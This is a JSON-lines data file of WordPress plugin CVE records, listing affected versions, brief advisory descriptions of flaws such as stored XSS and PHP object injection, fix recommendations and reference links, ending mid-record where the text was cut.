{"CVE_ID":"CVE-2023-6961","slug":"wp-meta-seo","versionImpact":"4.5.12","versionEndExcluding":"4.5.13","description":"The WP Meta SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018Referer\u2019 header in all versions up to, and including, 4.5.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.5.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca91e41d-b728-4eb0-86d5-043813d8c2c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca91e41d-b728-4eb0-86d5-043813d8c2c1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071453%40wp-meta-seo%2Ftrunk&old=3068145%40wp-meta-seo%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3071453%40wp-meta-seo%2Ftrunk&old=3068145%40wp-meta-seo%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6164","slug":"mainwp","versionImpact":"4.5.1.2","versionEndExcluding":"4.5.1.3","description":"The MainWP Dashboard  \u2013 WordPress Manager for Multiple Websites Maintenance plugin for WordPress is vulnerable to CSS Injection via the \u2018newColor\u2019 parameter in all versions up to, and including, 4.5.1.2 due to insufficient input sanitization. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary CSS values into the site tags.","recommendation":"Update to version 4.5.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73980a90-bb17-46e4-a0ea-691f80500fe3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73980a90-bb17-46e4-a0ea-691f80500fe3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/mainwp\\\/tags\\\/4.5.1.2&old=2996628&new_path=\\\/mainwp\\\/tags\\\/4.5.1.3&new=2996628&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/mainwp\\\/tags\\\/4.5.1.2&old=2996628&new_path=\\\/mainwp\\\/tags\\\/4.5.1.3&new=2996628&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10084","slug":"contact-form-7-dynamic-text-extension","versionImpact":"4.5","versionEndExcluding":"4.5.1","description":"The Contact Form 7 \u2013 Dynamic Text Extension plugin for WordPress is vulnerable to Basic Information Disclosure in all versions up to, and including, 4.5 via the CF7_get_post_var shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract the titles and text contents of private and password-protected posts, they do not own.","recommendation":"Update to version 4.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e051a83e-ad5a-4789-bfee-e03aa9d6a3fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e051a83e-ad5a-4789-bfee-e03aa9d6a3fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7-dynamic-text-extension\\\/tags\\\/4.5.0\\\/includes\\\/shortcodes.php#L225\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7-dynamic-text-extension\\\/tags\\\/4.5.0\\\/includes\\\/shortcodes.php#L225\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1649","slug":"chatbot","versionEndExcluding":"4.5.1","description":"The AI ChatBot WordPress plugin before 4.5.1 does not sanitise and escape numerous of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea806115-14ab-4bc4-a272-2141cb14454a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea806115-14ab-4bc4-a272-2141cb14454a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-54326","slug":"geo-my-wp","versionImpact":"4.5.0.4","versionEndExcluding":"4.5.1","description":"Missing Authorization vulnerability in Eyal Fitoussi GEO my WordPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects GEO my WordPress: from n\/a through 4.5.0.4.","recommendation":"Update to version 4.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/geo-my-wp\\\/vulnerability\\\/wordpress-geo-my-wp-plugin-4-5-0-4-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/geo-my-wp\\\/vulnerability\\\/wordpress-geo-my-wp-plugin-4-5-0-4-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5531","slug":"employee-directory","versionImpact":"4.5.0","versionEndExcluding":"4.5.1","description":"The Employee Directory \u2013 Staff Listing & Team Directory Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'emd_mb_meta' shortcode in all versions up to, and including, 4.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3295945%40employee-directory&new=3295945%40employee-directory&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3295945%40employee-directory&new=3295945%40employee-directory&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/143c5f1f-032c-4207-9401-20f18efcad9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/143c5f1f-032c-4207-9401-20f18efcad9d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-47327","slug":"geo-my-wp","versionImpact":"4.5.0.3","versionEndExcluding":"4.5.0.4","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Eyal Fitoussi GEO my WordPress allows Reflected XSS.This issue affects GEO my WordPress: from n\/a through 4.5.0.3.","recommendation":"Update to version 4.5.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/geo-my-wp\\\/wordpress-geo-my-wp-plugin-4-5-0-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/geo-my-wp\\\/wordpress-geo-my-wp-plugin-4-5-0-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6330","slug":"geo-my-wp","versionImpact":"4.5.0.1","versionEndExcluding":"4.5.0.2","description":"The GEO my WP WordPress plugin before 4.5.0.2 does not prevent unauthenticated attackers from including arbitrary files in PHP's execution context, which leads to Remote Code Execution.","recommendation":"Update to version 4.5.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/95b532e0-1ffb-421e-b9c0-de03f89491d7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/95b532e0-1ffb-421e-b9c0-de03f89491d7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13742","slug":"worpit-admin-dashboard-plugin","versionImpact":"4.4.5","versionEndExcluding":"4.5.0","description":"The iControlWP \u2013 Multiple WordPress Site Manager plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.4.5 via deserialization of untrusted input from the reqpars parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"Update to version 4.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/worpit-admin-dashboard-plugin\\\/tags\\\/4.4.5\\\/lib\\\/src\\\/LegacyApi\\\/RequestParameters.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/worpit-admin-dashboard-plugin\\\/tags\\\/4.4.5\\\/lib\\\/src\\\/LegacyApi\\\/RequestParameters.php#L42\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/worpit-admin-dashboard-plugin\\\/tags\\\/4.4.5\\\/src\\\/api\\\/RequestParameters.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/worpit-admin-dashboard-plugin\\\/tags\\\/4.4.5\\\/src\\\/api\\\/RequestParameters.php#L14\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f25b0cc-60ec-49a0-8356-fd3fba97e987?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f25b0cc-60ec-49a0-8356-fd3fba97e987?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2024-10896","slug":"logo-slider-wp","versionImpact":"4.1.0","versionEndExcluding":"4.5.0","description":"The Logo Slider  WordPress plugin before 4.5.0 does not sanitise and escape some of its Logo and Slider settings, which could allow high privilege users such as Contributor to perform Stored Cross-Site Scripting","recommendation":"Update to version 4.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1304c2b6-922d-455e-bae8-d6bf855eddd9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1304c2b6-922d-455e-bae8-d6bf855eddd9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10473","slug":"logo-slider-wp","versionImpact":"4.1.0","versionEndExcluding":"4.5.0","description":"The Logo Slider WordPress plugin before 4.5.0 does not sanitise and escape some of its Logo Settings when outputting them in pages where the Logo Slider shortcode is embedded, which could allow users with a role as low as Author to perform Cross-Site Scripting attacks.","recommendation":"Update to version 4.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7512cbdf-cf27-4a1f-bac8-9fcb14bf463e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7512cbdf-cf27-4a1f-bac8-9fcb14bf463e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13520","slug":"gift-voucher","versionImpact":"4.4.9","versionEndExcluding":"4.5.0","description":"The Gift Cards (Gift Vouchers and Packages) (WooCommerce Supported) plugin for WordPress is vulnerable to unauthorized modification of data|loss of data due to a missing capability check on the 'update_voucher_price', 'update_voucher_date', 'update_voucher_note' functions in all versions up to, and including, 4.4.6. This makes it possible for unauthenticated attackers to update the value, expiration date, and user note for any gift voucher.","recommendation":"Update to version 4.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-voucher\\\/trunk\\\/include\\\/edit-order-voucher.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-voucher\\\/trunk\\\/include\\\/edit-order-voucher.php#L30\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-voucher\\\/trunk\\\/include\\\/edit-order-voucher.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-voucher\\\/trunk\\\/include\\\/edit-order-voucher.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-voucher\\\/trunk\\\/include\\\/edit-order-voucher.php#L56\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-voucher\\\/trunk\\\/include\\\/edit-order-voucher.php#L56\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/190a21cd-9716-4a57-a793-63309c339427?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/190a21cd-9716-4a57-a793-63309c339427?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4371","slug":"woolementor","versionImpact":"4.4.1","versionEndExcluding":"4.5","description":"The CoDesigner WooCommerce Builder for Elementor \u2013 Customize Checkout, Shop, Email, Products & More plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.4.1 via deserialization of untrusted input from the recently_viewed_products cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1e5131a-9e72-441d-971c-8b9af35cf3f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1e5131a-9e72-441d-971c-8b9af35cf3f7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3099922%40woolementor&new=3099922%40woolementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3099922%40woolementor&new=3099922%40woolementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1660","slug":"chatbot","versionEndExcluding":"4.4.9","description":"The AI ChatBot WordPress plugin before 4.4.9 does not have authorisation and CSRF in a function hooked to init, allowing unauthenticated users to update some settings, leading to Stored XSS due to the lack of escaping when outputting them in the admin dashboard","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1a5cbcfc-fa55-433a-a76b-3881b6c4bea2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1a5cbcfc-fa55-433a-a76b-3881b6c4bea2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1651","slug":"chatbot","versionEndExcluding":"4.4.9","description":"The AI ChatBot WordPress plugin before 4.4.9 does not have authorisation and CSRF in the AJAX action responsible to update the OpenAI settings, allowing any authenticated users, such as subscriber to update them. Furthermore, due to the lack of escaping of the settings, this could also lead to Stored XSS","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c88b22ba-4fc2-49ad-a457-224157521bad\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c88b22ba-4fc2-49ad-a457-224157521bad\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23705","slug":"wp-books-gallery","versionEndExcluding":"4.4.9","description":"Cross-Site Request Forgery (CSRF) vulnerability in HM Plugin WordPress Books Gallery plugin <=\u00a04.4.8 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-books-gallery\\\/wordpress-wordpress-books-gallery-plugin-4-4-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-books-gallery\\\/wordpress-wordpress-books-gallery-plugin-4-4-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1650","slug":"chatbot","versionEndExcluding":"4.4.7","description":"The AI ChatBot WordPress plugin before 4.4.7 unserializes user input from cookies via an AJAX action available to unauthenticated users, which could allow them to perform PHP Object Injection when a suitable gadget is present on the blog","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d7fe498-0aa3-4fa7-b560-610b42b2abed\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d7fe498-0aa3-4fa7-b560-610b42b2abed\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11024","slug":"apppresser","versionImpact":"4.4.6","versionEndExcluding":"4.4.7","description":"The AppPresser \u2013 Mobile App Framework plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 4.4.6. This is due to the plugin not properly validating a user's password reset code prior to updating their password. This makes it possible for unauthenticated attackers, with knowledge of a user's email address, to reset the user's password and gain access to their account.","recommendation":"Update to version 4.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192531\\\/apppresser\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192531\\\/apppresser\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43cb0399-4add-43d5-863c-30e11803bd90?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43cb0399-4add-43d5-863c-30e11803bd90?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7071","slug":"essential-blocks","versionImpact":"4.4.6","versionEndExcluding":"4.4.7","description":"The Essential Blocks \u2013 Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Table of Contents block in all versions up to, and including, 4.4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f969cb24-734f-46e5-a74d-fddf8e61e096?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f969cb24-734f-46e5-a74d-fddf8e61e096?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/trunk\\\/blocks\\\/TableOfContents.php#L138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/trunk\\\/blocks\\\/TableOfContents.php#L138\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3018547\\\/essential-blocks\\\/tags\\\/4.4.7\\\/blocks\\\/TableOfContents.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3018547\\\/essential-blocks\\\/tags\\\/4.4.7\\\/blocks\\\/TableOfContents.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1959","slug":"social-warfare","versionImpact":"4.4.6.1","versionEndExcluding":"4.4.6.2","description":"The Social Sharing Plugin \u2013 Social Warfare plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'socialWarfare' shortcode in all versions up to, and including, 4.4.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.4.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1016f16c-0ab2-4cac-a7a5-8d93a37e7894?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1016f16c-0ab2-4cac-a7a5-8d93a37e7894?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-warfare\\\/tags\\\/4.4.5.1\\\/lib\\\/buttons-panel\\\/SWP_Buttons_Panel_Shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-warfare\\\/tags\\\/4.4.5.1\\\/lib\\\/buttons-panel\\\/SWP_Buttons_Panel_Shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3064109%40social-warfare&new=3064109%40social-warfare&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3064109%40social-warfare&new=3064109%40social-warfare&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13692","slug":"woo-refund-and-exchange-lite","versionImpact":"4.4.5","versionEndExcluding":"4.4.6","description":"The Return Refund and Exchange For WooCommerce \u2013 Return Management System, RMA Exchange, Wallet And Cancel Order Features plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.4.5 via several functions due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to overwrite linked refund image attachments, overwrite refund request message, overwrite order messages, and read order messages of other users.","recommendation":"Update to version 4.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-refund-and-exchange-lite\\\/trunk\\\/common\\\/class-woo-refund-and-exchange-lite-common.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-refund-and-exchange-lite\\\/trunk\\\/common\\\/class-woo-refund-and-exchange-lite-common.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-refund-and-exchange-lite\\\/trunk\\\/common\\\/class-woo-refund-and-exchange-lite-common.php#L186\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-refund-and-exchange-lite\\\/trunk\\\/common\\\/class-woo-refund-and-exchange-lite-common.php#L186\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-refund-and-exchange-lite\\\/trunk\\\/common\\\/class-woo-refund-and-exchange-lite-common.php#L374\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-refund-and-exchange-lite\\\/trunk\\\/common\\\/class-woo-refund-and-exchange-lite-common.php#L374\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-refund-and-exchange-lite\\\/trunk\\\/public\\\/class-woo-refund-and-exchange-lite-public.php#L381\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-refund-and-exchange-lite\\\/trunk\\\/public\\\/class-woo-refund-and-exchange-lite-public.php#L381\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3236486\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3236486\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dafbf6e2-1160-4551-a987-5e94c9157ff2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dafbf6e2-1160-4551-a987-5e94c9157ff2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13641","slug":"woo-refund-and-exchange-lite","versionImpact":"4.4.5","versionEndExcluding":"4.4.6","description":"The Return Refund and Exchange For WooCommerce \u2013 Return Management System, RMA Exchange, Wallet And Cancel Order Features plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.4.5 via the 'attachment' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/attachment directory which can contain file attachments for order refunds.","recommendation":"Update to version 4.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-refund-and-exchange-lite\\\/trunk\\\/common\\\/class-woo-refund-and-exchange-lite-common.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-refund-and-exchange-lite\\\/trunk\\\/common\\\/class-woo-refund-and-exchange-lite-common.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3236486\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3236486\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f88a21d-28a9-4c91-9bf9-6b69f6a420e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f88a21d-28a9-4c91-9bf9-6b69f6a420e8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4383","slug":"simple-membership","versionImpact":"4.4.5","versionEndExcluding":"4.4.6","description":"The Simple Membership plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'swpm_paypal_subscription_cancel_link' shortcode in all versions up to, and including, 4.4.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081024\\\/simple-membership\\\/trunk\\\/classes\\\/shortcode-related\\\/class.swpm-shortcodes-handler.php?old=3010737&old_path=%2Fsimple-membership%2Ftrunk%2Fclasses%2Fshortcode-related%2Fclass.swpm-shortcodes-handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081024\\\/simple-membership\\\/trunk\\\/classes\\\/shortcode-related\\\/class.swpm-shortcodes-handler.php?old=3010737&old_path=%2Fsimple-membership%2Ftrunk%2Fclasses%2Fshortcode-related%2Fclass.swpm-shortcodes-handler.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/tags\\\/4.4.3\\\/classes\\\/shortcode-related\\\/class.swpm-shortcodes-handler.php#L228\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/tags\\\/4.4.3\\\/classes\\\/shortcode-related\\\/class.swpm-shortcodes-handler.php#L228\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56fdbf80-8ea2-412a-b166-b7c27de88e70?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56fdbf80-8ea2-412a-b166-b7c27de88e70?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2031","slug":"video-conferencing-with-zoom-api","versionImpact":"4.4.4","versionEndExcluding":"4.4.5","description":"The Video Conferencing with Zoom plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'zoom_recordings_by_meeting' shortcode in all versions up to, and including, 4.4.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.4.5, or a newer patched 